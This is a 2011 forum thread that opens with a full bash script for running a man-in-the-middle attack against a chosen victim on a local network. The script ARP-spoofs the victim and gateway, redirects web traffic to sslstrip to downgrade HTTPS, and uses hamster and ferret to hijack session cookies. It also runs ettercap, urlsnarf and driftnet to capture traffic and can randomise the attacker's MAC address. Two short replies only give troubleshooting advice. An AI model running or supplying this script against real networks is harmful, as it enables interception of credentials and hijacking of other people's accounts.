Glynec Posted September 7, 2011 Posted September 7, 2011 #!/bin/bash # sidejackssl.sh v0.2 # tested in backtrack 4 R2 environment, run as root. # xterm used for window control # arpspoof poisons a single victim and gateway # ferret and hamster for sidejacking # sslstrip for https # ettercap for everything else # urlsnarf to monitor visited urls # driftnet for fun # firefox needs to be configured with a proxy of 127.0.0.1:1234 # url for hamster server is http://hamster # by gorara # a few variables (do not change) m1="0" # missing file var m1 m2="0" # missing file var m2 m3="0" # missing file var m3 m4="0" # missing file var m4 quickclean="0" # used for quick clean up randmac="n" # default setting do not randomize MAC hamsterfile="hamster.txt" # hamster output file (you can't change it) trap 'cleanup' SIGINT SIGTERM # detect control-c # a few more variables (change these if required) # xterm window variables x="0" # x offset value y="0" # y offset value width="120" # width value height="7" # height value yoffset="120" # y offset fgcolor="white" # foreground color bgcolor="black" # background color # style variables warnstyle="[\e[01;38mw\e[00m]" # warning msgs style execstyle="[\e[01;32mx\e[00m]" # execute msgs style infostyle="[\e[01;34mi\e[00m]" # informational msgs style inputstyle="[\e[01;30m?\e[00m]" # input msgs style # file variables sslstripfile="sslstrip.log" # sslstrip output file name snifffile="sniff-*" # hamster sniff file wildcard etterfile="etter.cap" # ettercap output cap file temp="/tmp" # temporary dir function usage { clear echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]" echo "" echo " -i interface interface to use, ex. eth0, wlan0." echo " -t target the target IP address." echo " -g gateway the gateway IP address." echo " -r randomize your MAC address," echo " only use for wired interfaces." echo " -h display this help screen." echo "" echo " examples: " echo " bash $0 -i eth0 -t 192.168.0.1 -g 192.168.0.254 -r" echo " bash $0 -i wlan0 -t 192.168.0.1 -g 192.168.0.254" echo "" exit 0 } function cleanup() { echo -e "\n$warnstyle control-c pressed! " # exit script if nothing has been modified if [[ "$quickclean" = "1" ]]; then echo -e "$infostyle nothing changed, all done!" exit 0 fi echo -e "$infostyle cleaning up..." echo -e "$execstyle flushing iptables..." iptables -F iptables -t nat -F echo -e "$execstyle turning off IP forwarding..." echo "0" > /proc/sys/net/ipv4/ip_forward # change back MAC address to orignal one if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then echo -e "$execstyle resetting MAC address..."; echo -e "$infostyle original MAC is: $origmac" ifconfig $interface down ifconfig $interface hw ether $origmac ifconfig $interface up if [ -z $gw ]; then echo -e "$warnstyle WARNING, you have no default gateway!" else route add default gw $gw fi rm $temp/mac.orig rm $temp/gw.orig fi echo -e "$execstyle cleaning up files..." echo -e "$infostyle temp directory: " # testing to see if files exist, if so display them... if [ -f $temp/$sslstripfile ]; then ls $temp/$sslstripfile else #echo -e "$warnstyle missing $sslstripfile" m1="1" fi if [ -f $temp/$etterfile ]; then ls $temp/$etterfile else #echo -e "$warnstyle missing $etterfile" m2="1" fi echo -e "$infostyle current directory: " if [ -f $snifffile ]; then ls $snifffile else #echo -e "$warnstyle missing $snifffile" m3="1" fi if [ -f $hamsterfile ]; then ls $hamsterfile else #echo -e "$warnstyle missing $hamsterfile" m4="1" fi # testing to see if there are any files at all if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then while [[ "$delete" != "y" || "$delete" != "n" ]] echo -en "$infostyle delete file(s)? [y/n]: " read delete do case "$delete" in y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;; n) echo -e "$warnstyle nothing deleted!"; break;; *) echo -e "$warnstyle wrong selection!"; esac done # delete files as requested if [[ "$delete_marker" = "y" ]]; then if [ -f $temp/$sslstripfile ]; then rm $temp/$sslstripfile fi if [ -f $temp/$etterfile ]; then rm $temp/$etterfile fi if [ -f $snifffile ]; then rm $snifffile fi if [ -f $hamsterfile ]; then rm $hamsterfile fi fi else echo -e "$warnstyle nothing to delete!" fi echo -e "$infostyle all done!" exit 0 } # start main program if [ "$#" -eq 0 ]; then usage fi while [ "$#" -gt 0 ] do case "$1" in -i) interface=$2; shift 1;; -r) randmac="y"; shift 1;; -t) target=$2; shift 1;; -g) gateway=$2; shift 1;; -h) usage;; -*) usage; break;; *) break;; esac shift done # required parameters if [[ -z $interface || -z $target || -z $gateway ]]; then usage exit 0 fi clear if [[ "$randmac" = "y" ]]; then mac="yes" else mac="no" fi # set quick cleanup flag quickclean="1" echo -e "$infostyle sidejacker/sslstrip script v0.2, by gorara" echo -e "$infostyle ctrl-c to abort at any time." echo -e "$infostyle attack summary:" echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac" if [[ "$randmac" = "y" ]]; then echo -e "$execstyle change of $interface MAC address requested." if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then echo -e "$infostyle wireless device detected..." echo -e "$warnstyle can't change MAC address without taking wifi interface down" echo -e "$warnstyle do it manually before connecting to the AP." exit 0 fi if [[ "$interface" = eth* ]]; then echo -e "$infostyle wired device detected..." echo -e "$warnstyle WARNING, this will take your wired interface down temporarily." echo -en "$inputstyle do you want to continue? [y/n]: " read continue if [[ "$continue" = "y" ]]; then echo -e "$infostyle proceeding..." else echo -e "$infostyle exiting..." exit 0 fi fi origmac=`ifconfig $interface | grep HWaddr | awk {'print $5'}` fi # before this, ctrl-c will exit script without doing anything. quickclean="0" # use macchanger to randomize MAC address, ect. if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then echo -e "$execstyle randomizing MAC address..."; gw=`route -n | grep UG | awk {'print $2'}` > $temp/gw.orig ifconfig $interface down macchanger -r $interface > $temp/mac.orig ifconfig $interface up if [ -z $gw ]; then echo -e "$warnstyle WARNING, you have no default gateway!" else route add default gw $gw fi origmac=`cat $temp/mac.orig | grep Current | awk {'print $3'}` fakemac=`cat $temp/mac.orig | grep Faked | awk {'print $3'}` echo -e "$infostyle original MAC is: $origmac" echo -e "$infostyle faked MAC is: $fakemac" fi echo -e "$execstyle turning on IP Forwarding..." echo "1" > /proc/sys/net/ipv4/ip_forward echo -e "$execstyle configuring iptables..." iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 sleep 1 echo -e "$execstyle starting hamster ... <logging to: $hamsterfile>" xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster & sleep 2 echo -e "$execstyle starting ferret ... <logging to: console>" y=$(($y+$yoffset)) xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface & sleep 2 echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>" y=$(($y+$yoffset)) xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -a -k -f -w $temp/$sslstripfile & sleep 2 echo -e "$execstyle starting ettercap ... <logging to: console>" y=$(($y+$yoffset)) xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -T -q -p -i $interface & sleep 2 echo -e "$execstyle starting urlsnarf ... <logging to: console>" y=$(($y+$yoffset)) xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface & sleep 2 echo -e "$execstyle starting driftnet ... <logging to: console>" y=$(($y+$yoffset)) xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "driftnet" -e driftnet -p -i $interface & sleep 2 echo -e "$infostyle trap is ready, now to direct traffic..." echo -e "$execstyle ARP poisoning the target..." y=$(($y+$yoffset)) xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway & sleep 1 echo -e "$infostyle run firefox and type http://hamster" echo -e "$infostyle don't forget to set proxy to 127.0.0.1:1234" echo -e "$infostyle press ctrl-c to exit and clean up... \n" for ((;;)) do read loop echo -en "$infostyle press ctrl-c to terminate!" done exit 0 Powered by bt4 - does not work on bt5 ((( Quote
digip Posted September 7, 2011 Posted September 7, 2011 Have you bothered to check if any of the files needed are installed and working in BT5? What kind of errors do you get when trying to run it? Also, while this is a forum where people use backtrack, have you bothered to look on the official backtrack forums for help. Might be better to post it there, than here. http://www.backtrack-linux.org/forums/ Quote
Mr-Protocol Posted September 7, 2011 Posted September 7, 2011 As digip said. Give errors. Use google. Check Backtrack-linux forums. http://www.backtrack-linux.org/forums/experts-forum/35648-another-script-sidejacking-2.html Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.